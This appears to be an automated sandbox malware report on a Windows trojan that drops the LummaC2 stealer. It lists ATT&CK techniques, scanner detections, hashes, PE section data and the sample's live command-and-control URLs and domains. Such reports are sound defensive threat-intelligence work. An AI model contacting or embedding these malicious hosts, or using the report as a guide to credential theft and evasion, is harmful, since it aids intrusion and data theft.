Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	1 Masquerading	OS Credential Dumping	841 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	12 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	261 Virtualization/Sandbox Evasion	Security Account Manager	261 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	214 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3stIhG821a.exe	55%	ReversingLabs	Win32.Trojan.Generic
3stIhG821a.exe	46%	Virustotal		Browse
3stIhG821a.exe	100%	Avira	HEUR/AGEN.1313526
3stIhG821a.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\LummaC2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\LummaC2.exe	37%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\Set-up.exe	26%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	0%	Avira URL Cloud	safe
censeractersj.click	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0M	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrm	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.fortth14ht.top	185.121.15.192	true	false		high
httpbin.org	34.226.108.155	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
wordyfindy.lat	false		high
curverpluch.lat	false		high
slipperyloo.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
censeractersj.click	true	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	true	Avira URL Cloud: safe	unknown
shapestickyr.lat	false		high
https://httpbin.org/ip	false		high
talkynicer.lat	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	true	Avira URL Cloud: safe	unknown
bashfulacid.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://curl.se/docs/http-cookies.html	3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	Set-up.exe, 00000002.00000003.1948806966.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948351357.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948193369.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1949334578.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000002.00000002.1949860672.00000000014B9000.00000004.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
http://.css	3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
https://httpbin.org/ipbefore	3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3	Set-up.exe, 00000002.00000003.1948806966.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948351357.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948193369.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1949334578.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrm	Set-up.exe, 00000002.00000003.1948374449.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0M	Set-up.exe, 00000002.00000002.1949353728.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948351357.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948193369.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948374449.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.jpg	3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.121.15.192	home.fortth14ht.top	Spain		207046	REDSERVICIOES	false
34.226.108.155	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581228
Start date and time:	2024-12-27 08:51:33 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3stIhG821a.exe renamed because original name is a hash value
Original Sample Name:	b50d06fdc5a763244d12f5d2e7c1ee3c.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/3@8/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 3stIhG821a.exe, PID 5756 because it is empty
Execution Graph export aborted for target Set-up.exe, PID 6960 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.121.15.192	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivetk5sb.top/v1/upload.php
	8kl5nJ3f9x.exe	Get hash	malicious	Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	7kf4hLzMoS.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twentytk20ht.top/v1/upload.php
	x6Rd1DzUJA.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivetk5sb.top/v1/upload.php
34.226.108.155	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse
	x6Rd1DzUJA.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	SzXZZDlkVE.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
home.fortth14ht.top	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
REDSERVICIOES	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	185.121.15.192
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192
	8kl5nJ3f9x.exe	Get hash	malicious	Cryptbot	Browse	185.121.15.192
	7kf4hLzMoS.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192
AMAZON-AESUS	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	3.218.7.103
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	50.17.226.153
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Set-up.exe	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
C:\Users\user\AppData\Local\Temp\Set-up.exe	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\LummaC2.exe	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
C:\Users\user\AppData\Local\Temp\LummaC2.exe	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3stIhG821a.exe.log

Download File

Process:	C:\Users\user\Desktop\3stIhG821a.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\LummaC2.exe

Download File

Process:	C:\Users\user\Desktop\3stIhG821a.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	299520
Entropy (8bit):	6.860310132420335
Encrypted:	false
SSDEEP:	6144:R5s/zt4HV88/rCatOZFABeDUbLv0uC8r9qMq2E9ND43F+ZnSi4:8rtsVPrNMG9qwENs8ZJ4
MD5:	607000C61FCB5A41B8D511B5ED7625D4
SHA1:	DFAA2BFEA8A51B14AC089BB6A39F037E769169D1
SHA-256:	C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
SHA-512:	64940F02635CCBC2DCD42449C0C435A6A50BD00FA93D6E2E161371CDC766103EF858CCBAAE4497A75576121EA7BC25BA54A9064748F9D6676989A4C9F8B50E58
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Joe Sandbox View:	Filename: DRWgoZo325.exe, Detection: malicious, Browse Filename: 8wiUGtm9UM.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...xZig............................ .............@..........................P............@.....................................................................(9...................................................................................text............................... ..`.rdata... ......."..................@..@.data...L....0...P..................@....reloc..(9.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Set-up.exe

Download File

Process:	C:\Users\user\Desktop\3stIhG821a.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6851208
Entropy (8bit):	6.451509958428788
Encrypted:	false
SSDEEP:	98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
MD5:	2A99036C44C996CEDEB2042D389FE23C
SHA1:	4F1E624BCC030E44722DE26B72C8156BF57E14E8
SHA-256:	73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
SHA-512:	6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:	Filename: DRWgoZo325.exe, Detection: malicious, Browse Filename: 8wiUGtm9UM.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.983948291225465
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3stIhG821a.exe
File size:	6'197'248 bytes
MD5:	b50d06fdc5a763244d12f5d2e7c1ee3c
SHA1:	3c809781c51c973199894746f7dab09ca9c6a416
SHA256:	80a8fee2e4d5909bf2dbe60be97d7ea44bbc5d9e3745caf83a06653287ea229c
SHA512:	eb52ddb0c3d66bfae4e48b96d97c2f95eebbc9e4832952fbd52926d73af29dab3766231fd03946ffb6f348c7d3f9dfe3b09754c038a48e6358d8cba689a0ea64
SSDEEP:	98304:LkkKwG21Ovtlc2jHCyHPmfttKL8K1mTMKd3VU0rfBKUmlShrxlxrWVpcb:LPKbHlc22yvmVtkx1nC1UVlSlxrWs
TLSH:	A7563302D0C776A9DDB6953C3CC24473903B2C0C8596BE568D7768A1FE33B5A9A7F086
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................<m.............. ...`m...@.. ....................... ......o._...@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xf2e000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676D92AB [Thu Dec 26 17:30:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FB0E8DD713Ah
movd mm3, dword ptr [esi+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FB0E8DD9135h
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6d8055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d6000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d81f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x6d4000	0x43d600	3eee6aa2e0ee72e0e4011d2175fbb3df	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6d6000	0x53c	0x400	f339161b4fe972df5d9f59751ff9771e	False	0.685546875	data	5.704558594871171	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6d8000	0x2000	0x200	6e9890d240b48e1a4145e7c2679977e3	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6da000	0x2aa000	0x200	2726ac930dedfe2cee94f735f48bd699	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
upduborm	0x984000	0x1a8000	0x1a6a00	fd4943c5018f7fb55a3ca098d5ac6840	False	0.9947887782830523	data	7.953488719166442	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fwbmyxqy	0xb2c000	0x2000	0x600	6a99cb2c5e4212cb8ef7f27a2f3bb1fd	False	0.55078125	data	4.904336512033749	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xb2e000	0x4000	0x2200	5405dabbdbcc87814f19c4f441ac966e	False	0.05859375	DOS executable (COM)	0.7872886857784928	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb2a4b8	0x244	data			0.4689655172413793
RT_MANIFEST	0xb2a6fc	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:52:31.055370092 CET	49735	443	192.168.2.4	34.226.108.155
Dec 27, 2024 08:52:31.055430889 CET	443	49735	34.226.108.155	192.168.2.4
Dec 27, 2024 08:52:31.055507898 CET	49735	443	192.168.2.4	34.226.108.155
Dec 27, 2024 08:52:31.058928967 CET	49735	443	192.168.2.4	34.226.108.155
Dec 27, 2024 08:52:31.058952093 CET	443	49735	34.226.108.155	192.168.2.4
Dec 27, 2024 08:52:32.858890057 CET	443	49735	34.226.108.155	192.168.2.4
Dec 27, 2024 08:52:32.859478951 CET	49735	443	192.168.2.4	34.226.108.155
Dec 27, 2024 08:52:32.859509945 CET	443	49735	34.226.108.155	192.168.2.4
Dec 27, 2024 08:52:32.861046076 CET	443	49735	34.226.108.155	192.168.2.4
Dec 27, 2024 08:52:32.861104965 CET	49735	443	192.168.2.4	34.226.108.155
Dec 27, 2024 08:52:32.862687111 CET	49735	443	192.168.2.4	34.226.108.155
Dec 27, 2024 08:52:32.862757921 CET	443	49735	34.226.108.155	192.168.2.4
Dec 27, 2024 08:52:32.873440981 CET	49735	443	192.168.2.4	34.226.108.155
Dec 27, 2024 08:52:32.873449087 CET	443	49735	34.226.108.155	192.168.2.4
